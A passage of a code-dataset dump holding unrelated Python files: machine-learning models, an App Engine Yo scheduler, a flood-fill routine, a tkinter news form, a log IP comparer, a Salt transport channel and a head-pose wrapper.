torch.cat((out_l, out_d), dim=1)\r\n # out_ld_set = torch.cat((out_ld, x_sub[:, 3].view(x_sub.size()[0], 1)), dim=1)\r\n # out_ldc = torch.cat((out_ld_set, out_c), dim=1)\r\n out_ldc = torch.cat((out_ld, out_c), dim=1)\r\n out_ldcvs = torch.cat((out_ldc, x_vs[:,0].view(x_vs.size()[0],1)), dim=1) # voltage\r\n\r\n\r\n # # concatenating with sublabels\r\n # out_ls = torch.cat((out_l, x_sub[:, 0].view(x_sub.size()[0], 1)), dim=1) #l\r\n # out_lsd = torch.cat((out_ls, out_d), dim=1)\r\n # out_lsds = torch.cat((out_lsd, x_sub[:, 1].view(x_sub.size()[0], 1)), dim=1) #d\r\n # # out_lsd_set = torch.cat((out_lsd, x_sub[:, 3].view(x_sub.size()[0], 1)), dim=1) # setup time\r\n # # out_lsds = torch.cat((out_lsd_set, x_sub[:, 1].view(x_sub.size()[0], 1)), dim=1)\r\n # out_lsdsc = torch.cat((out_lsds, out_c), dim=1)\r\n # out_lsdscs = torch.cat((out_lsdsc, x_sub[:, 2].view(x_sub.size()[0], 1)), dim=1) #c\r\n\r\n # Activation layer 2\r\n # out = F.selu(self.fc1(out_ldc)) # activation layer\r\n # out = F.tanh(self.fc1(out_ldc)) # activation layer\r\n out = F.selu(self.fc1(out_ldcvs)) # activation layer\r\n # out = F.tanh(self.fc1(out_ldc)) # activation layer, tanhshrink better\r\n # out = F.selu(self.fc1(out_lsdscs)) # activation layer\r\n # out = F.tanh(self.fc1(out_lsdscs)) # activation layer\r\n # print(out.size()) #[batch, hidden]\r\n # out = F.dropout(out, training=self.training)\r\n out = F.dropout(out, p=self.dropout, training=self.training)\r\n out = self.fc2(out) # output layer\r\n # print(out.size()) #[hidden, 1]\r\n\r\n\r\n del h0_l, c0_l, h0_d, c0_d, h0_c, c0_c, out_l_a, out_d_a, out_c_a, out_l, out_d, out_c, out_ld, out_ldc, out_ldcvs\r\n torch.cuda.empty_cache()\r\n # return out\r\n return out, sub_l, sub_d, sub_c","sub_path":"main/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"108799906","text":"import webapp2, urllib, jinja2, os\nfrom google.appengine.api import taskqueue\nfrom google.appengine.api import urlfetch\n\nfrom apikeys import * # contains api key for YOAFTER15MIN,YOAFTER30MIN,YOAFTERANHOUR \n\nSINGLE_YO_API = \"http://api.justyo.co/yo/\"\n\njinja_environment = jinja2.Environment(autoescape=True,\n loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')))\n\nclass 
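For readers tracing shapes through the BiLSTM model record above: with bidirectional=True the LSTM output carries both directions side by side in its last dimension, so out[:, -1, :] and out[:, 0, :] are each 2*hidden_dim wide, and concatenating them is what the nn.Linear(hidden_dim * 4, hidden_dim) readout expects. A minimal standalone shape check (toy sizes, not the record's configuration):

import torch
import torch.nn as nn

hidden_dim = 8
rnn = nn.LSTM(input_size=4, hidden_size=hidden_dim, num_layers=1,
              batch_first=True, bidirectional=True)
x = torch.randn(2, 5, 4)                  # (batch, seq_len, features)
out, _ = rnn(x)
print(out.shape)                          # torch.Size([2, 5, 16]): last dim is 2 * hidden_dim
ends = torch.cat((out[:, -1, :], out[:, 0, :]), dim=1)
print(ends.shape)                         # torch.Size([2, 32]): hidden_dim * 4, as the fc layer expects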
BaseScheduleHandler(webapp2.RequestHandler):\n \n def __init__(self, request=None, response=None, apitoken=None, delay=None):\n self.initialize(request, response)\n self.apitoken = apitoken\n self.delay = delay\n \n def get(self):\n username = self.request.get(\"username\")\n if username:\n taskqueue.add(url=\"/yo\", params={\"username\":username.upper(), \"api_token\":self.apitoken}, method=\"POST\", countdown=self.delay)\n\n \nclass FifteenMinuteHandler(BaseScheduleHandler):\n def __init__(self, request=None, response=None):\n BaseScheduleHandler.__init__(self, request, response, YOAFTER15MIN, 15 * 60)\n \nclass ThirtyMinuteHandler(BaseScheduleHandler):\n def __init__(self, request=None, response=None):\n BaseScheduleHandler.__init__(self, request, response, YOAFTER30MIN, 30 * 60)\n\nclass OneHourHandler(BaseScheduleHandler):\n def __init__(self, request=None, response=None):\n BaseScheduleHandler.__init__(self, request, response, YOAFTERANHOUR, 60 * 60)\n \nclass YoHandler(webapp2.RequestHandler):\n \n def post(self):\n params = {field:self.request.get(field) for field in self.request.arguments()}\n if \"username\" in params and \"api_token\" in params:\n form_data = urllib.urlencode(params)\n urlfetch.fetch(url=SINGLE_YO_API,\n payload=form_data,\n method=urlfetch.POST,\n headers={'Content-Type': 'application/x-www-form-urlencoded'})\n\nclass HomePageHandler(webapp2.RequestHandler):\n \n def get(self):\n template = jinja_environment.get_template(\"index.html\")\n self.response.write(template.render({}))\n\napp = webapp2.WSGIApplication([ (\"/\", HomePageHandler),\n (YOAFTERANHOUR_CALLBACK, OneHourHandler),\n (YOAFTER30MIN_CALLBACK, ThirtyMinuteHandler),\n (YOAFTER15MIN_CALLBACK, FifteenMinuteHandler),\n (\"/yo\", YoHandler) ], debug=True)\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"146253951","text":"import math\n\nclass DummySensor:\n def __init__(self):\n self.vel = 0\n self.pos = 0\n self.current = 0\n self.voltage = 0\n self.x = 0\n\n def read_dummy(self):\n self.incr_dummy_data()\n self.x += 0.01\n return (self.vel, self.pos, self.current, self.voltage)\n\n def incr_dummy_data(self):\n self.current = self._incr_gaus(self.x)\n self.vel = self._incr_sigmoid(self.x)\n self.pos = self._incr_log(self.x)\n self.voltage = self._incr_const(self.x)\n\n @staticmethod\n def _incr_gaus(x):\n return (\n 3*math.exp(\n -math.pow((x-8), 2) / 12\n )\n )\n\n @staticmethod\n def _incr_sigmoid(x):\n return (\n 2 / (\n 1 + math.exp(-(x-5))\n )\n )\n\n @staticmethod\n def _incr_log(x):\n return math.log(x+1, 10)\n\n @staticmethod\n def _incr_const(x):\n return 2\n\ndef run():\n import matplotlib.pyplot as plt\n dum_boy = DummySensor()\n x_coords = []\n vels = []\n poss = []\n currents = []\n voltages = []\n for x in range(0, 1000):\n x_coords.append(x)\n vel, pos, current, voltage = dum_boy.read_dummy()\n vels.append(vel)\n poss.append(pos)\n currents.append(current)\n voltages.append(voltage)\n plt.plot(x_coords, poss, label=\"Position\")\n plt.plot(x_coords, vels, label=\"Velocity\")\n plt.plot(x_coords, currents, label=\"Currents\")\n plt.plot(x_coords, voltages, label=\"Voltages\")\n plt.title(label=\"Test Sensor\")\n plt.legend(loc=\"best\")\n plt.show()\n\nif __name__ == '__main__':\n 
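The three scheduler handlers in the webapp2 record above differ only in the API token and the countdown they pass to taskqueue.add, which is what produces the 15/30/60-minute delays. The core call in isolation (username and token values are placeholders, not values from the record):

from google.appengine.api import taskqueue

# Enqueue a POST to /yo that the task queue delivers ~15 minutes from now.
taskqueue.add(url="/yo",
              params={"username": "EXAMPLE", "api_token": "placeholder-token"},
              method="POST",
              countdown=15 * 60)   # delay, in seconds, before the task runs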
run()\n","sub_path":"lib/testing/dummy_sensor.py","file_name":"dummy_sensor.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"464622573","text":"'''\n'''\n\nfrom ambry.bundle import BuildBundle\n \n\nclass Bundle(BuildBundle):\n ''' '''\n \n def __init__(self,directory=None):\n self.super_ = super(Bundle, self)\n self.super_.__init__(directory)\n\n\n def get_srs(self):\n import ogr\n places = self.library.dep('places').partition\n row = places.query(\"SELECT spsrs FROM places where code = ?\",'SndSAN').fetchone()\n \n srs = ogr.osr.SpatialReference()\n srs.ImportFromEPSG(int(row['spsrs']))\n \n return srs\n\n def build(self):\n '''Build HDF files that contain the rasterized blocks'''\n import ogr\n from ambry.geo.analysisarea import AnalysisArea\n from osgeo.gdalconst import GDT_Float32\n from ambry.geo.sfschema import TableShapefile\n import numpy as np\n # average meters per degree at latitude 32, computed from m/d lat\n # and m/d lon. \n mpd = (110886.79 + 94493.11) / 2\n dpm = (1.0/mpd)\n \n blocks_p = self.partitions.find_or_new_hdf(table='blocks')\n \n contour = dpm * 40 # Space buffer contours at 20m\n \n contour = 10\n \n ca_blocks= self.library.dep('blocks_ca').partition\n blocks_srs = ca_blocks.get_srs()\n sp_srs = self.get_srs()\n\n lr = self.init_log_rate(500)\n\n #tracts = self.partitions.find_or_new_geo(table='tracts')\n #tracts.clean()\n\n edp = lambda x: self.filesystem.path('extracts',x+'.tiff')\n\n \n for block in ca_blocks.query(\n \"\"\"SELECT geoid as name, countyfp, AsText(geometry) \n AS geometry FROM blocks\n WHERE countyfp = 73 \n \"\"\"):\n\n block = dict(block)\n\n g = ogr.CreateGeometryFromWkt(block['geometry'])\n g.AssignSpatialReference(blocks_srs)\n \n g.TransformTo(sp_srs) \n \n gs = [g]\n \n if g.Area() > 100000:\n \n in_g = g.Clone()\n out_g = g.Clone()\n \n for i in range(5):\n \n out_g = out_g.Buffer(contour)\n\n gs = [out_g] + gs \n \n if in_g.Area() > 8000:\n in_g = in_g.Buffer(-contour)\n gs = gs + [in_g]\n \n \n else:\n out_g = g.Clone()\n \n aa = AnalysisArea.new_from_geometry(out_g)\n aa.scale = 10\n\n #print '---', len(gs), out_g.Area()\n #print aa\n\n layer = aa.get_rasterlayer(data_type=GDT_Float32)\n \n #for i,g in enumerate(gs):\n # layer.add_geometry(g, (i+1)*10 )\n \n layer.add_geometry(g, i )\n \n a = layer.rasterize()\n \n a = a / np.sum(a) # Normalize to 1\n \n \n blocks_p.database.put_geo('blocks/'+block['name'], a, aa)\n\n lr()\n\n \n def rasterize(self):\n from ambry.geo.analysisarea import AnalysisArea\n from ambry.geo.kernel import ArrayKernel\n from ambry.datasets.geo import US\n from osgeo.gdalconst import GDT_Float32\n \n places = self.library.dep('places').partition\n place = US(self.library).place('SndSAN')\n \n blocks_p = self.partitions.find_or_new_hdf(table='blocks')\n \n san_aa = place.aa(scale=10)\n san_aa_a = san_aa.new_array()\n\n geofile= self.library.dep('geofile').partition\n \n lr = self.init_log_rate(1000)\n \n aa_in = 0\n aa_out = 0\n \n for i,block in enumerate(geofile.query(\"\"\"\n SELECT * FROM blocks WHERE placens = 2411782\n \"\"\")):\n\n if block['pop100'] == 0:\n continue\n\n block = dict(block)\n\n try:\n b,aa = blocks_p.database.get_geo('blocks/{}'.format(block['geoid']))\n except KeyError:\n #self.error(block['geoid'])\n continue\n \n \n lr(\"{} / {} \".format(aa_in, aa_out))\n\n density = float(block['pop100']) \n\n # Convert the raster for the block into a kernel se we can use\n # the kernel code to apply 
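The dummy-sensor record above synthesizes its channels from closed-form curves: the current channel is the Gaussian bump 3*exp(-(x-8)^2/12), so its peak at x = 8 is exactly 3, and the velocity channel is the sigmoid 2/(1+exp(-(x-5))), which saturates toward 2. A small numeric check of both claims, using only the record's formulas:

import math

peak = 3 * math.exp(-((8 - 8) ** 2) / 12)
print(peak)                   # 3.0, the Gaussian maximum at x = 8
vel = 2 / (1 + math.exp(-(10 - 5)))
print(round(vel, 3))          # 1.987, the sigmoid closing in on its ceiling of 2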
it to the raster. \n k = ArrayKernel(b, density)\n \n (x,y) = san_aa.translate_to_array(*aa.upper_left)\n \n #x += ( k.center - (k.oshape[1]/2) )\n #y += ( k.center - (k.oshape[0]/2) )\n\n # A few of the records wont fit in the area after adding k.center\n try: k.apply_add(san_aa_a, x, y)\n except: pass\n lr()\n \n edp = lambda x: self.filesystem.path('extracts',x+'.tiff')\n \n \n san_aa.write_geotiff(edp('test'), san_aa_a, data_type=GDT_Float32) ","sub_path":"bundle.py","file_name":"bundle.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"441287780","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n item_num = len(preorder)\n if item_num == 0:\n return None\n elif item_num == 1:\n return TreeNode(preorder[0])\n else:\n root_value = preorder[0]\n root = TreeNode(root_value)\n inorder_root_index = inorder.index(root_value)\n root.left = self.buildTree(preorder[1:1 + inorder_root_index], inorder[:inorder_root_index])\n root.right = self.buildTree(preorder[1 + inorder_root_index:], inorder[1 + inorder_root_index:])\n return root","sub_path":"Week_03/105.py","file_name":"105.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"486262894","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\ndef paint_fill(screen, row, column, new_color):\r\n def fill(r, c):\r\n if r < 0 or r >= len(screen) or c < 0 or c >= len(screen[0]):\r\n return\r\n if screen[r][c] != old_color:\r\n return\r\n screen[r][c] = new_color\r\n fill(r - 1, c) # up\r\n fill(r, c - 1) # left\r\n fill(r + 1, c) # down\r\n fill(r, c + 1) # right\r\n\r\n old_color = screen[row][column]\r\n if old_color == new_color:\r\n return\r\n fill(row, column)\r\n\r\n\r\nif __name__ == '__main__':\r\n screen = [\r\n [5, 5, 5, 5, 5, 7, 5, 5],\r\n [5, 5, 5, 7, 7, 7, 7, 5],\r\n [5, 7, 5, 7, 7, 5, 5, 5],\r\n [5, 5, 7, 7, 7, 5, 5, 5],\r\n [5, 5, 5, 5, 7, 7, 7, 5],\r\n ]\r\n\r\n for row in screen:\r\n print(row)\r\n print()\r\n\r\n print('Filling at point (2, 3) with color 0\\n')\r\n paint_fill(screen, 2, 3, 0)\r\n\r\n for row in screen:\r\n print(row)\r\n print()\r\n","sub_path":"ctci/python/ch8_recursion_and_dynamic_programming/q10_paint_fill.py","file_name":"q10_paint_fill.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"470760613","text":"from tkinter import *\r\nfrom datetime import datetime as dt\r\n\r\nroot = Tk()\r\n\r\nroot.geometry(\"655x333\")\r\n\r\nroot.config(background = \"black\")\r\n\r\n\r\ndef getvals():\r\n print(\"Submitting form...;\")\r\n print(f\"{usernamevalue.get(), phonevalue.get(), emailvalue.get()}\")\r\n\r\n with open(\"records1.txt\", \"a\") as f:\r\n f.write(f\"{usernamevalue.get(), phonevalue.get(), emailvalue.get()}\\n\")\r\n\r\nLabel(root, text = \"Inlongs\", bg = \"black\", fg = \"yellow\", font = \"comicsans 16 bold\", pady = 15, padx = 75, relief = RAISED).pack()\r\nLabel(root, text = \"Get the fastest news on here....\", font = \"bold\", bg = \"black\", fg = \"white\").pack()\r\nLabel(root,text=f\"Date : {dt.now().date()}\",font=\"lucida 15 bold\", fg = \"white\", bg =\"black\").pack()\r\n\r\n\r\nf1 = Frame(root, 
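The preorder/inorder reconstruction in the 105.py record above calls inorder.index() and slices both lists at every level, which is O(n^2) time in the worst case. A common refinement (not part of the record) builds a value-to-index map once and recurses on index bounds; it relies on the problem's guarantee that values are unique:

class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

def build_tree(preorder, inorder):
    idx = {v: i for i, v in enumerate(inorder)}        # one O(n) pass replaces repeated .index()
    def helper(pre_lo, pre_hi, in_lo, in_hi):
        if pre_lo > pre_hi:
            return None
        root = TreeNode(preorder[pre_lo])              # first preorder entry is the subtree root
        k = idx[root.val]                              # where the root splits the inorder range
        left_size = k - in_lo
        root.left = helper(pre_lo + 1, pre_lo + left_size, in_lo, k - 1)
        root.right = helper(pre_lo + left_size + 1, pre_hi, k + 1, in_hi)
        return root
    return helper(0, len(preorder) - 1, 0, len(inorder) - 1)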
borderwidth = 6, bg = \"grey\", relief = SUNKEN, width = 1400 )\r\n\r\nl = Label(f1, text = \"India reports 49,310 new cases\\nTotal cases stand at 12,87,945 including 4,40,135 active cases.\\nIndia also reported 740 new deaths, taking the toll to 30,601.\\nTotal number of cured/discharged/migrated stand at 8,17,209.\", font = \"Helvetica 16 bold\", fg = \"black\", pady = 20)\r\nl.pack()\r\n\r\nf1.pack(anchor = \"n\")\r\n\r\nf1 = Frame(root, borderwidth = 6, bg = \"grey\", relief = SUNKEN)\r\n\r\nl = Label(f1, text = \"Women's tennis cancels all China events in 2020 over coronavirus.\", font = \"Helvetica 16 bold\", fg = \"black\", pady = 20)\r\nl.pack()\r\n\r\nf1.pack(anchor = \"n\")\r\n\r\nf1 = Frame(root, borderwidth = 6, bg = \"grey\", relief = SUNKEN)\r\n\r\nl = Label(f1, text = \"Rajasthan HC Live updates: Can the Speaker disqualify Sachin Pilot? Verdict soon\\nThe 19 dissident MLAs had filed a petition in the high court, challenging the disqualification notices.\\nGehlot said those who went to court are the ones who were wrong and had been misguided.\", font = \"Helvetica 16 bold\", fg = \"black\", pady = 20)\r\nl.pack()\r\n\r\nf1.pack(anchor = \"n\")\r\n\r\nframe1 = Frame(root)\r\n\r\nusername = Label(frame1, text = \"Username \", bg = \"grey\")\r\nusername.pack(side = LEFT)\r\nusernamevalue = StringVar()\r\nusernameentry = Entry(frame1, textvariable = usernamevalue)\r\nusernameentry.pack(side = LEFT)\r\n\r\nframe1.pack()\r\n\r\nframe1 = Frame(root)\r\n\r\nphone = Label(frame1, text = \"Phone No.\", bg = \"grey\")\r\nphone.pack(side = LEFT)\r\nphonevalue = StringVar()\r\nphoneentry = Entry(frame1, textvariable = phonevalue)\r\nphoneentry.pack(side = RIGHT)\r\n\r\nframe1.pack()\r\n\r\nframe1 = Frame(root)\r\n\r\nemail = Label(frame1, text = \"Email-ID \", bg = \"grey\")\r\nemail.pack(side = LEFT)\r\nemailvalue= StringVar()\r\nemailentry = Entry(frame1, textvariable = emailvalue)\r\nemailentry.pack(side = LEFT)\r\n\r\nframe1.pack()\r\n\r\nframe1 = Frame(root)\r\n\r\nButton(frame1, text = \"Submit..\", command = getvals).pack()\r\n\r\nframe1.pack()\r\n\r\nroot.mainloop()","sub_path":"News.py","file_name":"News.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"148811013","text":"# -*- coding=utf-8 -*-\n#Find the IPs that appear in both log files\n\nimport re \nregex = re.compile(r'\\d{2,3}\\.\\d{2,3}\\.\\d{2,3}\\.\\d{2,3}')\n\nf1 = input('Please select the first file:')\nf2 = input('Please select the second file:')\n\ndef find_same_ip(file_1,file_2):\n\n\tpre_fn_1 = []\n\tnew_fn_1 = [] \n\tpre_fn_2 = []\n\tnew_fn_2 = []\n\tthe_same_ip = []\n\t#read every line of one log file into a list\n\t#if one line contains several IPs, we get [[,,,],[,,,],...]\n\t#iterate over that nested list and append its elements to the end of the list\n\twith open(file_1) as f1:\n\t\tfn_1 = f1.readlines() \n\t\tfor i in range(0,len(fn_1)): \n\t\t\tfn_1[i] = fn_1[i].strip('\\n') \n\t\t\tfn_1[i] = regex.findall(fn_1[i]) \n\t\t\tif len(fn_1[i]) >1: \n\t\t\t\tfor h in fn_1[i]: \n\t\t\t\t\tfn_1.append(h)\n\t#add the non-nested elements of the list to a new list\n\tfor i in fn_1:\n\t\tif type(i) != type([]):\n\t\t\tpre_fn_1.append(i)\n\t#deduplicate the new list\n\tfor i in pre_fn_1:\n\t\tif i not in new_fn_1:\n\t\t\tnew_fn_1.append(i)\n\n\twith open(file_2) as f2: \n\t\tfn_2 = f2.readlines() \n\t\tfor i in range(0,len(fn_2)): \n\t\t\tfn_2[i] = fn_2[i].strip('\\n') \n\t\t\tfn_2[i] = regex.findall(fn_2[i]) \n\t\t\tif len(fn_2[i]) >1: \n\t\t\t\tfor h in fn_2[i]: \n\t\t\t\t\tfn_2.append(h) \n\tfor i in fn_2:\n\t\tif type(i) != type([]):\n\t\t\tpre_fn_2.append(i)\n\n\tfor i in pre_fn_2:\n\t\tif i not in new_fn_2:\n\t\t\tnew_fn_2.append(i) \n\t#compute the intersection of the two lists\n\tfor i in new_fn_1:\n\t\tif i in new_fn_2:\n\t\t\tthe_same_ip.append(i)\t\t\n\t#f1 and f2 cannot be used here, the output comes out wrong\n\tprint('IPs common to files %s and %s:\\n' % (file_1,file_2))\n\t\n\tfor i in the_same_ip:\n\t\tprint(i)\n\n\nfind_same_ip(f1,f2)","sub_path":"自编码文件/从两个日志文件行中找相同IP.py","file_name":"从两个日志文件行中找相同IP.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"66512449","text":"import pandas as pd \r\nimport tensorflow as tf\r\nfrom tensorflow import feature_column\r\nfrom tensorflow.keras import layers\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\n\r\n\r\ndataframe = pd.read_csv(\"feats/combined.csv\", encoding = \"utf-8\")\r\n\r\ntrain, test = train_test_split(dataframe, test_size = .2)\r\ntrain, val = train_test_split(train, test_size=.2)\r\nprint(len(train), 'train examples')\r\nprint(len(val), 'validation examples')\r\nprint(len(test), 'test examples')\r\n\r\n\r\n\r\ndef df_to_dataset(dataframe, shuffle=False, batch_size=32):\r\n\tdataframe = dataframe.copy()\r\n\tlabels = dataframe.pop('target')\r\n\tds = tf.data.Dataset.from_tensor_slices((dict(dataframe), labels))\r\n\tif shuffle:\r\n\t\tds = ds.shuffle(buffer_size=len(dataframe))\r\n\tds = ds.batch(batch_size)\r\n\treturn ds\r\n\r\ntrain_ds = df_to_dataset(train, shuffle = True)\r\nval_ds = df_to_dataset(val)\r\ntest_ds = df_to_dataset(test)\r\n\r\nheaders = []\r\n\r\nfor feature_batch, label_batch in train_ds.take(1):\r\n\theaders = list(feature_batch.keys())\r\n\r\n\tprint('A batch of targets:', label_batch )\r\n\r\n\r\nf_cols = []\r\n\r\nfor header in headers:\r\n\tf_cols.append(feature_column.numeric_column(header))\r\n\r\nfeat_layer = tf.keras.layers.DenseFeatures(f_cols)\r\n\r\n\r\n\r\nmodel = tf.keras.models.Sequential([\r\n feat_layer,\r\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\r\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\r\n tf.keras.layers.Dropout(0.2),\r\n tf.keras.layers.Dense(10, activation=tf.nn.softmax)\r\n])\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(train_ds, epochs=10)\r\nmodel.evaluate(test_ds)\r\n\r\n","sub_path":"ostest.py","file_name":"ostest.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"59037447","text":"# -*- coding: utf-8 -*-\n'''\nEncapsulate the different transports available to Salt. 
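The log-comparison script above flattens, deduplicates, and intersects with nested loops, which is quadratic in the number of addresses. Python sets give the same answer in roughly linear time, at the cost of first-seen ordering; a sketch in the same spirit but with a slightly widened pattern (the record's \d{2,3} octets would miss single-digit ones, and the file names here are illustrative):

import re

ip_re = re.compile(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}')

def ips_in(path):
    # Collect the distinct IPs of one log file in a single pass.
    with open(path) as fh:
        return {ip for line in fh for ip in ip_re.findall(line)}

common = ips_in('first.log') & ips_in('second.log')   # set intersection
for ip in sorted(common):
    print(ip)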
Currently this is only ZeroMQ.\n'''\n\nimport salt.payload\nimport salt.auth\n\n\nclass Channel(object):\n\n @staticmethod\n def factory(opts, **kwargs):\n\n # Default to ZeroMQ for now\n ttype = 'zeromq'\n\n if 'transport_type' in opts:\n ttype = opts['transport_type']\n elif 'transport_type' in opts.get('pillar', {}).get('master', {}):\n ttype = opts['pillar']['master']['transport_type']\n\n if ttype == 'zeromq':\n return ZeroMQChannel(opts, **kwargs)\n else:\n raise Exception(\"Channels are only defined for ZeroMQ\")\n # return NewKindOfChannel(opts, **kwargs)\n\n\nclass ZeroMQChannel(Channel):\n\n '''\n Encapsulate sending routines to ZeroMQ.\n\n ZMQ Channels default to 'crypt=aes'\n '''\n\n def __init__(self, opts, **kwargs):\n self.opts = opts\n\n # crypt defaults to 'aes'\n self.crypt = kwargs['crypt'] if 'crypt' in kwargs else 'aes'\n\n self.serial = salt.payload.Serial(opts)\n if self.crypt != 'clear':\n self.auth = salt.crypt.SAuth(opts)\n if 'master_uri' in kwargs:\n master_uri = kwargs['master_uri']\n else:\n master_uri = opts['master_uri']\n\n self.sreq = salt.payload.SREQ(master_uri)\n\n def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):\n ret = self.sreq.send('aes', self.auth.crypticle.dumps(load), tries, timeout)\n key = self.auth.get_keys()\n aes = key.private_decrypt(ret['key'], 4)\n pcrypt = salt.crypt.Crypticle(self.opts, aes)\n return pcrypt.loads(ret[dictkey])\n\n def _crypted_transfer(self, load, tries=3, timeout=60):\n '''\n In case of authentication errors, try to renegotiate authentication\n and retry the method.\n Indeed, we can fail too early in case of a master restart during a\n minion state execution call\n '''\n def _do_transfer():\n return self.auth.crypticle.loads(\n self.sreq.send(self.crypt,\n self.auth.crypticle.dumps(load),\n tries,\n timeout)\n )\n try:\n return _do_transfer()\n except salt.crypt.AuthenticationError:\n self.auth = salt.crypt.SAuth(self.opts)\n return _do_transfer()\n\n def _uncrypted_transfer(self, load, tries=3, timeout=60):\n return self.sreq.send(self.crypt, load, tries, timeout)\n\n def send(self, load, tries=3, timeout=60):\n\n if self.crypt != 'clear':\n return self._crypted_transfer(load, tries, timeout)\n else:\n return self._uncrypted_transfer(load, tries, timeout)\n # Do we ever do non-crypted transfers?\n","sub_path":"sources/salt/transport/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636444863","text":"import torch\nimport torch.nn as nn\nimport time\nfrom torchvision import transforms\n\nfrom lib.headpose import module_init, head_pose_estimation\nfrom mtcnn.mtcnn import MTCNN\n\nfrom detectron2.config import get_cfg\n\nfrom utils.add_config import *\n\nclass MTCNN(object):\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"\n Args:\n cfg (CfgNode):\n instance_mode (ColorMode):\n \"\"\"\n self.cpu_device = torch.device(\"cpu\")\n self.instance_mode = instance_mode\n\n self.head_pose_module = module_init(cfg)\n self.mtcnn = MTCNN()\n self.transformations = transforms.Compose([transforms.Resize(224), \\\n transforms.CenterCrop(224), transforms.ToTensor(), \\\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n self.softmax = nn.Softmax(dim=1).cuda()\n\n idx_tensor = [idx for idx in range(66)]\n self.idx_tensor = torch.FloatTensor(idx_tensor).cuda()\n\n def run_on_image(self, image):\n \"\"\"\n Args:\n image 
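The _crypted_transfer method in the Salt channel above encodes a small, reusable pattern: attempt the call, and on an authentication error rebuild the session and retry exactly once, which covers a master restart mid-call. Stripped of the Salt specifics, the shape is (all names illustrative):

def call_with_reauth(do_call, reauthenticate, auth_error=Exception):
    # Try once; on an auth failure, renegotiate credentials and try once more.
    try:
        return do_call()
    except auth_error:
        reauthenticate()
        return do_call()   # a second failure propagates to the caller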
(np.ndarray): an image of shape (H, W, C) (in BGR order).\n This is the format used by OpenCV.\n \"\"\"\n # note: operate on the image argument (the original referenced an undefined name)\n predictions, bounding_box, face_keypoints, w, face_area = head_pose_estimation(image, self.mtcnn, self.head_pose_module, self.transformations, self.softmax, self.idx_tensor)\n\n return predictions, bounding_box\n\ndef setup_mtcnn(cfg_keypoint, confidence_threshold, weights):\n \"\"\"\n ATTENTION: Must be called before mtcnn()\n \"\"\"\n # load config from file and command-line arguments\n cfg = get_cfg()\n add_config(cfg)\n cfg.merge_from_file(cfg_keypoint)\n\n # Set score_threshold for builtin models\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = confidence_threshold\n cfg.MODEL.WEIGHTS = weights\n\n cfg.freeze()\n\n demo = MTCNN(cfg)\n\n # setup_logger comes from detectron2; imported here because it is missing at module level\n from detectron2.utils.logger import setup_logger\n setup_logger(name=\"MTCNN\")\n logger = setup_logger()\n\n return cfg, demo\n\ndef mtcnn(image, cfg, demo, confidence_threshold, weights, logger):\n \"\"\"\n Args:\n image (np.ndarray): an image of shape (H, W, C) (in BGR order).\n This is the format used by OpenCV.\n cfg (path): path to the default Keypoint RCNN config file provided by detectron2\n demo (MTCNN object): instance of the MTCNN class\n confidence_threshold (float): the confidence threshold of the network\n weights (path): path to the object detection weights\n logger (logger):\n \"\"\"\n start_time = time.time()\n predictions, bounding_box = demo.run_on_image(image)\n logger.info(\n \"detected {} instances in {:.2f}s\".format(\n len(predictions[\"instances\"]), time.time() - start_time\n )\n )\n\n return predictions, bounding_box\n","sub_path":"mtcnn.py","file_name":"mtcnn.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
